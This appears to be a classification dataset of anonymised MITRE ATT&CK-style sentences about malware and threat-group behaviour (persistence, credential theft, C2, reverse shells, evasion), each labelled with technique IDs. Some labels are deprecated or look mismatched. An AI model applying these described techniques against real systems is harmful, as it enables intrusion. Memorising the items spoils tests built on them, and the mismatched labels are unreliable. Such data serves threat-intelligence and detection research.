{"text1":"One persistence mechanism used by  is to register itself as a Windows service.","labels":"['T1543.003']"}
{"text1":"One variant of  creates a new service using either a hard-coded or randomly generated name.","labels":"['T1543.003']"}
{"text1":"One variant of  uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.","labels":"['T1102']"}
{"text1":"One variant of  uses HTTP and HTTPS for C2.","labels":"['T1071']"}
{"text1":"One version of  consists of VBScript and PowerShell scripts. The malware also uses batch scripting.","labels":"['T1064']"}
{"text1":"One version of  uses a PowerShell script.","labels":"['T1059.001']"}
{"text1":"opens a backdoor on TCP ports 6868 and 7777.","labels":"['T1571']"}
{"text1":"opens a remote shell to execute commands on the infected system.","labels":"['T1059']"}
{"text1":"opens the Windows Firewall to modify incoming connections.","labels":"['T1562.001']"}
{"text1":"operates over ports 21 and 20.","labels":"['T1043']"}
{"text1":"packs a plugin with UPX.","labels":"['T1027.002']"}
{"text1":"parses the export tables of system DLLs to locate and call various Windows API functions.","labels":"['T1106']"}
{"text1":"Part of 's operation involved using  modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.","labels":"['T1091']"}
{"text1":"Password stealer and NTLM stealer modules in  harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.  has also executed  for further victim penetration.","labels":"['T1003']"}
{"text1":"payloads are obfuscated prior to compilation to inhibit analysis and\/or reverse engineering.","labels":"['T1027']"}
{"text1":"payloads download additional files from the C2 server.","labels":"['T1105']"}
{"text1":"performed a watering hole attack on forbes.com in 2014 to compromise targets.","labels":"['T1189']"}
{"text1":"performs account discovery using commands such as net localgroup administrators and net group \"REDACTED\" \/domain on specific permissions groups.","labels":"['T1087']"}
{"text1":"performs a reflective DLL injection using a given pid.","labels":"['T1055']"}
{"text1":"performs BIOS modification and can download and execute a file as well as protect itself from removal.","labels":"['T1542.001']"}
{"text1":"performs data exfiltration is accomplished through the following command-line command: from <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt.","labels":"['T1020']"}
{"text1":"performs data exfiltration over the control server channel using a custom protocol.","labels":"['T1041']"}
{"text1":"performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.","labels":"['T1113']"}
{"text1":"performs local network connection discovery using netstat.","labels":"['T1049']"}
{"text1":"performs most of its operations using Windows Script Host (Jscript and VBScript) and runs arbitrary shellcode .","labels":"['T1064']"}
{"text1":"performs multiple process injections to hijack system processes and execute malicious code.","labels":"['T1055']"}
{"text1":"performs operating system information discovery using systeminfo.","labels":"['T1082']"}
{"text1":"performs service discovery using net start commands.","labels":"['T1007']"}
{"text1":"performs several anti-VM and sandbox checks on the victim's machine.","labels":"['T1518.001']"}
{"text1":"performs the tasklist command to list running processes.","labels":"['T1057']"}
{"text1":"performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.  performs a separate injection of its communication module into an Internet accessible process through which it performs C2.","labels":"['T1055']"}
{"text1":"performs timestomping of a CAB file it creates.","labels":"['T1070.006']"}
{"text1":"performs UAC bypass.","labels":"['T1548.002']"}
{"text1":"persists via a Launch Agent.","labels":"['T1543.001']"}
{"text1":"persists via a login item.","labels":"['T1547.015']"}
{"text1":"probes the system to check for sandbox\/virtualized environments and other antimalware processes.","labels":"['T1518.001']"}
{"text1":"prompts the user for their credentials.","labels":"['T1056']"}
{"text1":"prompts users for their credentials.","labels":"['T1056']"}
{"text1":"provides access to the system via SSH or any other protocol that uses PAM to authenticate.","labels":"['T1071']"}
{"text1":"provides access to the Windows Registry, which can be used to gather information.","labels":"['T1012']"}
{"text1":"provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet","labels":"['T1059']"}
{"text1":"provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet","labels":"['T1205.001']"}
{"text1":"provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.","labels":"['T1205.001']"}
{"text1":"provides a reverse shell on the victim.","labels":"['T1059']"}
{"text1":"puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.","labels":"['T1036.006']"}
{"text1":"queries Registry keys in preparation for setting Run keys to achieve persistence.","labels":"['T1012']"}
{"text1":"queries several Registry keys to identify hard disk partitions to overwrite.","labels":"['T1012']"}
{"text1":"queries the Registry for specific keys for potential privilege escalation and proxy information.","labels":"['T1012']"}
{"text1":"queries the Registry to determine the correct Startup path to use for persistence.","labels":"['T1012']"}
{"text1":"ran a command to compile an archive of file types of interest from the victim user's directories.","labels":"['T1005', 'T1119']"}
{"text1":"ran a reverse shell with Meterpreter.","labels":"['T1059']"}
{"text1":"ran genuinely-signed executables from Symantec and McAfee which loaded a malicious DLL called rastls.dll.","labels":"['T1574.002']"}
{"text1":"RAT is able to delete files.","labels":"['T1070.004']"}
{"text1":"RAT is able to list processes.","labels":"['T1057']"}
{"text1":"RAT is able to open a command shell.","labels":"['T1059']"}
{"text1":"RAT is able to wipe event logs.","labels":"['T1070']"}
{"text1":"recursively generates a list of files within a directory and sends them back to the control server.","labels":"['T1119']"}
{"text1":"registers itself as a service by adding several Registry keys.","labels":"['T1543.003']"}
{"text1":"registers itself as a service on the victim\u2019s machine to run as a standalone process.","labels":"['T1569.002']"}
{"text1":"registers itself under a Registry Run key with the name \"USB Disk Security.\"","labels":"['T1547.001']"}
{"text1":"relays traffic between a C2 server and a victim.","labels":"['T1090']"}
{"text1":"removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection.","labels":"['T1070.004']"}
{"text1":"removes logs from \/var\/logs and \/Library\/logs.","labels":"['T1070']"}
{"text1":"renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.","labels":"['T1036']"}
{"text1":"replaces the Sticky Keys binary C:\\Windows\\System32\\sethc.exe for persistence.","labels":"['T1546.008']"}
{"text1":"reports window names along with keylogger information to provide application context.","labels":"['T1010']"}
{"text1":"Rundll32.exe is used as a way of executing  at the command-line.","labels":"['T1218.011']"}
{"text1":"runs cmd.exe \/c and sends the output to its C2.","labels":"['T1059']"}
{"text1":"runs ipconfig \/all and collects the domain name.","labels":"['T1016']"}
{"text1":"runs its core DLL file using rundll32.exe.","labels":"['T1218.011']"}
{"text1":"runs tasklist to obtain running processes.","labels":"['T1057']"}
{"text1":"runs tests to determine the privilege level of the compromised user.","labels":"['T1033']"}
{"text1":"runs the command: net start >> %TEMP%\\info.dat on a victim.","labels":"['T1007']"}
{"text1":"runs the command net user on a victim.  also runs tests to determine the privilege level of the compromised user.","labels":"['T1087']"}
{"text1":"runs the ifconfig command to obtain the IP address from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"runs the net view \/domain and net view commands.","labels":"['T1018']"}
{"text1":"runs the net view command","labels":"['T1018']"}
{"text1":"runs the whoami and query user commands.","labels":"['T1033']"}
{"text1":"runs whoami on the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32.","labels":"['T1546.015']"}
{"text1":"samples have been signed with a code-signing certificates.","labels":"['T1553.002']"}
{"text1":"samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.","labels":"['T1553.002']"}
{"text1":"samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.","labels":"['T1027.002']"}
{"text1":"samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.","labels":"['T1553.002']"}
{"text1":"samples were timestomped by the authors by setting the PE timestamps to all zero values.  also has a built-in command to modify file times.","labels":"['T1070.006']"}
{"text1":"saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .","labels":"['T1119']"}
{"text1":"saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.","labels":"['T1036']"}
{"text1":"saves itself with a leading \".\" so that it's hidden from users by default.","labels":"['T1564.001']"}
{"text1":"scanned the \u201cProgram Files\u201d directories for a directory with the string \u201cTotal Security\u201d (the installation path of the \u201c360 Total Security\u201d antivirus tool).","labels":"['T1518.001']"}
{"text1":"scans processes on all victim systems in the environment and uses automated scripts to pull back the results.","labels":"['T1064', 'T1119']"}
{"text1":"scans the C-class subnet of the IPs on the victim's interfaces.","labels":"['T1018']"}
{"text1":"schedules the execution one of its modules by creating a new scheduler task.","labels":"['T1053.005']"}
{"text1":"scripts save memory dump data into a specific directory on hosts in the victim environment.","labels":"['T1074']"}
{"text1":"searches attached and mounted drives for file extensions and keywords that match a predefined list.","labels":"['T1083']"}
{"text1":"searches for certain Registry keys to be configured before executing the payload.","labels":"['T1012']"}
{"text1":"searches for files created within a certain timeframe and whose file extension matches a predefined list.","labels":"['T1083']"}
{"text1":"searches for files named logins.json to parse for credentials and also looks for credentials stored from browsers.","labels":"['T1552.001']"}
{"text1":"searches for files on attached removable drives based on a predefined list of file extensions every five seconds.","labels":"['T1025']"}
{"text1":"searches for files on local drives based on a predefined list of file extensions.","labels":"['T1005']"}
{"text1":"searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by .","labels":"['T1025']"}
{"text1":"searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.","labels":"['T1083']"}
{"text1":"searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.","labels":"['T1114']"}
{"text1":"searches for network drives and removable media and duplicates itself onto them.","labels":"['T1105']"}
{"text1":"searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.","labels":"['T1114']"}
{"text1":"searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.","labels":"['T1119']"}
{"text1":"searches the local system and gathers data.","labels":"['T1005']"}
{"text1":"searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip","labels":"['T1083']"}
{"text1":"searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).","labels":"['T1114']"}
{"text1":"searches victim drives for files matching certain extensions (\u201c.skr\u201d,\u201c.pkr\u201d or \u201c.key\u201d) or names.","labels":"['T1083']"}
{"text1":"SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands.","labels":"['T1550.002']"}
{"text1":"sends an OS version identifier in its beacons.","labels":"['T1082']"}
{"text1":"sends emails to victims with a malicious executable disguised as a document or spreadsheet displaying a fake icon.","labels":"['T1598.002']"}
{"text1":"sends images to users that are embedded with shellcode and obfuscates strings and payloads.","labels":"['T1027']"}
{"text1":"sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.","labels":"['T1082']"}
{"text1":"sent malicious attachments to victims over email, including an Excel spreadsheet containing macros to download Pupy.","labels":"['T1598.002']"}
{"text1":"sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.","labels":"['T1598.003']"}
{"text1":"sent spear phishing emails containing links to .hta files.","labels":"['T1598.003']"}
{"text1":"sent spearphishing emails containing malicious Microsoft Office attachments.","labels":"['T1598.002']"}
{"text1":"sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.","labels":"['T1598.003']"}
{"text1":"service-based DLL implant can execute a downloaded file with parameters specified using CreateProcessAsUser.","labels":"['T1546.009']"}
{"text1":"service-based DLL implant traverses the FTP server\u2019s directories looking for files with keyword matches for computer names or certain keywords.","labels":"['T1083']"}
{"text1":"sets a WH_CBT Windows hook to collect information on process creation.","labels":"['T1057']"}
{"text1":"sets a WH_CBT Windows hook to search for and capture files on the victim.","labels":"['T1083']"}
{"text1":"sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.","labels":"['T1070.006']"}
{"text1":"Several  backdoors achieved persistence by adding a Run key.","labels":"['T1547.001']"}
{"text1":"Several  malware families are capable of downloading and executing binaries from its C2 server.","labels":"['T1105']"}
{"text1":"Several  malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by  also collects disk space information and sends it to its C2 server.","labels":"['T1082']"}
{"text1":"Several  malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another  malware sample XORs C2 traffic.  malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, evading SSL man-in-the-middle decryption attacks.","labels":"['T1573']"}
{"text1":"Several  malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.","labels":"['T1070.006']"}
{"text1":"Several  malware samples use a common function to identify target files by their extension.  malware families can also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.","labels":"['T1083']"}
{"text1":"Several  tools encode data with base64 when posting it to a C2 server.","labels":"['T1132']"}
{"text1":"shellcode decrypts and decompresses its RC4-encrypted payload.","labels":"['T1140']"}
{"text1":"side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.","labels":"['T1574.002']"}
{"text1":"Some  malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes commonly used ports such as 443, 53, 80, 25, and 8080.","labels":"['T1043']"}
{"text1":"Some  malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others.","labels":"['T1571']"}
{"text1":"Some  malware uses multiple channels for C2, such as RomeoWhiskey-Two, which consists of a RAT channel that parses data in datagram form and a Proxy channel that forms virtual point-to-point sessions.","labels":"['T1026']"}
{"text1":"Some resources in  are encrypted with a simple XOR operation or encoded with Base64.","labels":"['T1027']"}
{"text1":"Some  samples contain a publicly available Web browser password recovery tool.","labels":"['T1003']"}
{"text1":"Some  samples have a module to extract email from Microsoft Exchange servers using compromised credentials.","labels":"['T1078', 'T1114']"}
{"text1":"Some  samples have a module to use pass the ticket with Kerberos for authentication.","labels":"['T1550.003']"}
{"text1":"Some  samples install themselves as services for persistence by calling WinExec with the net start argument.","labels":"['T1543.003']"}
{"text1":"Some  samples use a custom encryption method for C2 traffic using AES, base64 encoding, and multiple keys.","labels":"['T1573']"}
{"text1":"Some  samples use AES to encrypt C2 traffic.","labels":"['T1573']"}
{"text1":"Some  samples use cmd.exe to delete temporary files.","labels":"['T1070.004']"}
{"text1":"Some  samples were signed with a stolen digital certificate.","labels":"['T1553.002']"}
{"text1":"Some strings in are obfuscated with XOR x56.","labels":"['T1027']"}
{"text1":"Some  variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.","labels":"['T1071']"}
{"text1":"Some variants of  achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.","labels":"['T1546.015']"}
{"text1":"Some variants of  use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"","labels":"['T1546.010']"}
{"text1":"Some variants of  use SSL to communicate with C2 servers.","labels":"['T1071']"}
{"text1":"Some  variants use HTTP for C2.","labels":"['T1071']"}
{"text1":"Some  variants use ports 8080 and 8000 for C2.","labels":"['T1043']"}
{"text1":"Some  variants use raw TCP for C2.","labels":"['T1095']"}
{"text1":"Some  variants use SSL to encrypt C2 communications.","labels":"['T1573']"}
{"text1":"Some  versions have an embedded DLL known as MockDll that uses  and regsvr32 to execute another payload.","labels":"['T1218.010']"}
{"text1":"Some  versions have an embedded DLL known as MockDll that uses process hollowing and  to execute another payload.","labels":"['T1055.012']"}
{"text1":"Some versions of  have used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.","labels":"['T1573']"}
{"text1":"spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware.","labels":"['T1055.012']"}
{"text1":"spearphished victims via Facebook and Whatsapp.","labels":"['T1566.003']"}
{"text1":"spear phishing campaigns have included malicious Word documents with DDE execution.","labels":"['T1559.002']"}
{"text1":"specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally","labels":"['T1069']"}
{"text1":"splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.","labels":"['T1030']"}
{"text1":"stages command output and collected data in files before exfiltration.","labels":"['T1074']"}
{"text1":"stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.","labels":"['T1074']"}
{"text1":"steals credentials from compromised hosts. 's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by  include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).","labels":"['T1003']"}
{"text1":"steals credentials from its victims.","labels":"['T1003']"}
{"text1":"steals credentials stored in Web browsers by querying the sqlite database and leveraging the Windows Vault mechanism.","labels":"['T1003']"}
{"text1":"steals data stored in the clipboard.","labels":"['T1115']"}
{"text1":"steals files based on an extension list if a USB drive is connected to the system.","labels":"['T1025']"}
{"text1":"steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1005']"}
{"text1":"steals user files from local hard drives with file extensions that match a predefined list.","labels":"['T1005']"}
{"text1":"steals user files from network shared drives with file extensions and keywords that match a predefined list.","labels":"['T1039']"}
{"text1":"stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.","labels":"['T1547.001']"}
{"text1":"stores configuration values under the Registry key HKCU\\Software\\Microsoft\\[dllname] and modifies Registry keys under HKCR\\CLSID\\...\\InprocServer32with a path to the launcher.","labels":"['T1112']"}
{"text1":"stores information gathered from the endpoint in a file named 1.hwp.","labels":"['T1074']"}
{"text1":"stores itself in ~\/Library\/.DS_Stores\/","labels":"['T1564.001']"}
{"text1":"stores output from command execution in a .dat file in the %TEMP% directory.","labels":"['T1074']"}
{"text1":"stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContorlSet\\Control\\WMI\\Security.","labels":"['T1112']"}
{"text1":"supports execution from the command-line.","labels":"['T1059']"}
{"text1":"supports file encryption (AES with the key \"lolomycin2017\").","labels":"['T1027']"}
{"text1":"surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.","labels":"['T1049']"}
{"text1":"surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory.","labels":"['T1083']"}
{"text1":"surveys a system upon check-in to discover information in the Windows Registry with the reg query command.","labels":"['T1012']"}
{"text1":"surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, and net config commands.","labels":"['T1016']"}
{"text1":"surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.","labels":"['T1082']"}
{"text1":"surveys a system upon check-in to discover remote systems on a local network using the net view and net view \/DOMAIN commands.","labels":"['T1018']"}
{"text1":"surveys a system upon check-in to discover the system time by using the net time command.","labels":"['T1124']"}
{"text1":"takes screenshots of the compromised system's desktop and saves them to C:\\system\\screenshot.bmp for exfiltration every 60 minutes.","labels":"['T1113']"}
{"text1":"terminates anti-malware processes if they\u2019re found running on the system.","labels":"['T1562.001']"}
{"text1":"The 's Information Gathering Tool (IGT) includes PowerShell components.","labels":"['T1059.001']"}
{"text1":"The \"SCOUT\" variant of  achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key.","labels":"['T1547.001']"}
{"text1":"The \"tDiscoverer\" variant of  establishes a C2 channel by downloading resources from Web services like Twitter and GitHub.  binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.","labels":"['T1102']"}
{"text1":"The \"Uploader\" variant of  visits a hard-coded server over HTTP\/S to download the images  uses to receive commands.","labels":"['T1071']"}
{"text1":"The \"ZR\" variant of  will check to see if known host-based firewalls are installed on the infected systems.  will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.","labels":"['T1562.001']"}
{"text1":"The  3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.","labels":"['T1547.009', 'T1547.001']"}
{"text1":"The  backdoor compresses communications using the standard Zlib compression library.","labels":"['T1560']"}
{"text1":"The  C2 channel uses an 11-byte XOR algorithm to hide data.","labels":"['T1573']"}
{"text1":"The  C2 channel uses HTTP POST requests.","labels":"['T1071']"}
{"text1":"The C2 server response to a beacon sent by a variant of  contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of  use various XOR operations to encrypt C2 data.","labels":"['T1573']"}
{"text1":"The  client has been signed by fake and invalid digital certificates.","labels":"['T1553.002']"}
{"text1":"The  command and control protocol's data stream can be encrypted with AES-CBC.","labels":"['T1573']"}
{"text1":"The  component KillDisk is capable of deleting Windows Event Logs.","labels":"['T1070']"}
{"text1":"The  config file is encrypted with RC4.","labels":"['T1027']"}
{"text1":"The  crimeware toolkit has refined its detection of sandbox analysis environments by inspecting the process list and Registry.","labels":"['T1518.001']"}
{"text1":"The discovery modules used with  can collect information on accounts and permissions.","labels":"['T1087']"}
{"text1":"The discovery modules used with  can collect information on network connections.","labels":"['T1049']"}
{"text1":"The discovery modules used with  can collect information on process details.","labels":"['T1057']"}
{"text1":"The  dropper can delete itself from the victim. Another  variant has the capability to delete specified files.","labels":"['T1070.004']"}
{"text1":"The  dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main  component.","labels":"['T1218.011']"}
{"text1":"The  dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.","labels":"['T1036']"}
{"text1":"The  dropper uses a function to obfuscate the name of functions and other parts of the malware.","labels":"['T1027']"}
{"text1":"The  dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.","labels":"['T1047']"}
{"text1":"The executable version of  has a module to log keystrokes.","labels":"['T1056']"}
{"text1":"The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by  as a name for malware.","labels":"['T1036']"}
{"text1":"The  group has been known to compress data before exfiltration.","labels":"['T1560']"}
{"text1":"The  group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate. Some malware that has been used by  also uses steganography to hide communication in PNG image files.","labels":"['T1001']"}
{"text1":"The  group is known to utilize WMI for lateral movement.","labels":"['T1047']"}
{"text1":"The initial beacon packet for  contains the operating system version and file system of the victim.","labels":"['T1082']"}
{"text1":"The initial beacon packet for  contains the operating system version of the victim.","labels":"['T1082']"}
{"text1":"The  installer loads a DLL using rundll32.","labels":"['T1218.011']"}
{"text1":"The  loader implements itself with the name Security Support Provider, a legitimate Windows function. Various  .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare.  also disguised malicious modules using similar filenames as custom network encryption software on victims.","labels":"['T1036']"}
{"text1":"The  malware communicates through the use of events in Google Calendar.","labels":"['T1102']"}
{"text1":"The  malware communicates to its command server using HTTP with an encrypted payload.","labels":"['T1071']"}
{"text1":"The  malware platform can use ICMP to communicate between infected computers.","labels":"['T1095']"}
{"text1":"The  malware platform can use Windows admin shares to move laterally.","labels":"['T1021.002']"}
{"text1":"The  malware supports timestomping.","labels":"['T1070.006']"}
{"text1":"The net accounts and net accounts \/domain commands with  can be used to obtain password policy information.","labels":"['T1201']"}
{"text1":"The net time command can be used in  to determine the local or remote system time.","labels":"['T1124']"}
{"text1":"The net user username \\password and net user username \\password \\domain commands in  can be used to create a local or domain account respectively.","labels":"['T1136']"}
{"text1":"The OsInfo function in  collects a running process list.","labels":"['T1057']"}
{"text1":"The OsInfo function in  collects the current running username.","labels":"['T1033']"}
{"text1":"The  payload is stored in a hidden directory at \/Users\/Shared\/.local\/kextd.","labels":"['T1564.001']"}
{"text1":"The payload of  is encrypted with simple XOR with a rotating key. The  configuration file has been encrypted with RC4 keys.","labels":"['T1027']"}
{"text1":"The  RAT has a keylogger.","labels":"['T1056']"}
{"text1":"The reconnaissance modules used with  can collect information on network configuration.","labels":"['T1016']"}
{"text1":"There is a variant of  that uses a PowerShell script instead of the traditional PE form.","labels":"['T1059.001']"}
{"text1":"The Ritsol backdoor trojan used by  can download files onto a compromised host from a remote location.","labels":"['T1105']"}
{"text1":"The  trojan supports file deletion.","labels":"['T1070.004']"}
{"text1":"The  uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated.","labels":"['T1070.004']"}
{"text1":"To establish persistence,  adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager.","labels":"['T1036']"}
{"text1":"To establish persistence,  identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.","labels":"['T1547.009', 'T1036', 'T1547.001']"}
{"text1":"tools attempt to spoof anti-virus processes as a means of self-defense.","labels":"['T1036']"}
{"text1":"tools contained an application to check performance of USB flash drives.","labels":"['T1120']"}
{"text1":"Traffic traversing the  network will be forwarded to multiple nodes before exiting the  network and continuing on to its intended destination.","labels":"['T1090.003']"}
{"text1":"transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.","labels":"['T1041']"}
{"text1":"transfers files from the compromised host via HTTP or HTTPS to a C2 server.","labels":"['T1071']"}
{"text1":"tries to add a Registry Run key under the name \"Windows Update\" to establish persistence.","labels":"['T1547.001']"}
{"text1":"tries to add a scheduled task to establish persistence.","labels":"['T1053.005']"}
{"text1":"TRINITY malware used by  identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\. Once the malware collects the data,  actors compressed data and moved it to another staging system before exfiltration.","labels":"['T1074']"}
{"text1":"typically use ping and  to enumerate systems.","labels":"['T1018']"}
{"text1":"uploads and downloads information.","labels":"['T1105']"}
{"text1":"uploads data in 2048-byte chunks.","labels":"['T1030']"}
{"text1":"uploads files and secondary payloads to the victim's machine.","labels":"['T1105']"}
{"text1":"used a cloud-based remote access software called LogMeIn for their attacks.","labels":"['T1219']"}
{"text1":"used a cron job for persistence on Mac devices.","labels":"['T1053']"}
{"text1":"used an HTTP malware variant and a Port 22 malware variant to collect the victim\u2019s username.","labels":"['T1033']"}
{"text1":"used a rootkit to modify typical server functionality.","labels":"['T1014']"}
{"text1":"used a SharePoint enumeration and data dumping tool known as spwebmember.","labels":"['T1213']"}
{"text1":"used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.","labels":"['T1083']"}
{"text1":"used Base64 to encode C2 traffic.","labels":"['T1132']"}
{"text1":"used Base64 to obfuscate commands and the payload.","labels":"['T1027']"}
{"text1":"used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","labels":"['T1016']"}
{"text1":"used batch scripts to enumerate users in the victim environment.","labels":"['T1087']"}
{"text1":"used cmd.exe to launch commands on the victim\u2019s machine.","labels":"['T1059']"}
{"text1":"used command line for execution.","labels":"['T1059']"}
{"text1":"used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.","labels":"['T1102']"}
{"text1":"used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.","labels":"['T1220']"}
{"text1":"used PowerShell scripts for execution.","labels":"['T1059.001']"}
{"text1":"used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.","labels":"['T1018', 'T1046']"}
{"text1":"used RDP to move laterally in victim networks.","labels":"['T1021.001']"}
{"text1":"used regsvr32.exe to execute scripts.","labels":"['T1218.010']"}
{"text1":"used Regsvr32 to bypass application whitelisting techniques.","labels":"['T1218.010']"}
{"text1":"used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.","labels":"['T1053.005']"}
{"text1":"used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as  use a blend of HTTP and other legitimate channels, depending on module configuration.","labels":"['T1071']"}
{"text1":"used spearphishing emails with malicious Microsoft Word attachments to infect victims.","labels":"['T1598.002']"}
{"text1":"used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.","labels":"['T1598.003']"}
{"text1":"used sticky-keys to obtain unauthenticated, privileged console access.","labels":"['T1546.008']"}
{"text1":"used the Ammyy Admin tool as well as TeamViewer for remote access.","labels":"['T1219']"}
{"text1":"used the Plink command-line utility to create SSH tunnels to C2 servers.","labels":"['T1573', 'T1071']"}
{"text1":"used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1.","labels":"['T1036']"}
{"text1":"used  to download payloads, run a reverse shell, and execute malware on the victim's machine.","labels":"['T1059.001']"}
{"text1":"used  to launch an authentication window for users to enter their credentials.","labels":"['T1187']"}
{"text1":"used  to remove artifacts from victims.","labels":"['T1070']"}
{"text1":"used UPX to pack files.","labels":"['T1027.002']"}
{"text1":"used various social media channels to spearphish victims.","labels":"['T1566.003']"}
{"text1":"used VBS and JavaScript scripts to help perform tasks on the victim's machine.","labels":"['T1064']"}
{"text1":"used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.","labels":"['T1133']"}
{"text1":"use HTTPS for all command and control communication methods.","labels":"['T1071']"}
{"text1":"uses 's malleable C2 functionality to blend in with network traffic.","labels":"['T1095']"}
{"text1":"uses 443 for C2 communications.","labels":"['T1043']"}
{"text1":"uses a backup communication method with an HTTP beacon.","labels":"['T1008']"}
{"text1":"uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.","labels":"['T1547.001']"}
